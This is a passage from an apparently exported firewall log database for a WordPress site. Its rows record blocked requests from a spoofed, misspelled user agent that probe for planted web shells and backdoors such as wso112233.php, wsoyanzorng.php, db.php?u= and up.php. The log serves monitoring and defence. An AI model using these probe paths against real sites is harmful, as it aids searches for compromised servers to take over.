User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaWQvc2lkd3NvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12588,1674997996.674310,1674997996.521800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/bala.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2JhbGEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12589,1674997984.345860,1674997984.212700,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/wso112233.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvd3NvMTEyMjMzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12590,1674997971.346886,1674997971.215700,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso112233.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzbzExMjIzMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12591,1675001320.331514,1675001320.196500,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/pridmag/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3ByaWRtYWcvZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12592,1675001314.068132,1675001313.836900,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/linkpreview/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9saW5rcHJldmlldy9kYi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12593,1675001294.573976,1675001294.443800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12594,1675001262.849177,1675001262.570000,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12595,1675001418.916496,1675001418.799300,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/edit.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2VkaXQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12596,1675001418.488408,1675001418.348500,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12597,1675001372.979595,1675001372.840900,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wordpresss3cll/up.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JkcHJlc3NzM2NsbC91cC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12598,1675001334.946746,1675001334.819800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/xwp/up.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy94d3AvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12599,1675003919.976304,1675003919.848000,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/ccx/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NjeC9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12600,1675003886.735163,1675003886.601700,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ccx/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jY3gvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12601,1675003824.674165,1675003824.528200,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12602,1675003812.863558,1675003812.681700,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12603,1675011119.078810,1675011118.953600,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/ccx/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NjeC9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12604,1675011107.072594,1675011106.929800,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ccx/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jY3gvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12605,1675011095.683843,1675011095.523400,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12606,1675011082.923861,1675011082.794800,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12607,1675027845.553338,1675027845.423600,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12608,1675027796.836048,1675027796.707000,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12609,1675031048.723562,1675031048.584000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12610,1675031046.433940,1675031046.305200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12611,1675031067.257533,1675031067.132400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12612,1675031064.902645,1675031064.776200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12613,1675047309.854970,1675047309.138400,'\0\0\0\0\0\0\0\0\0\0�����Q',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 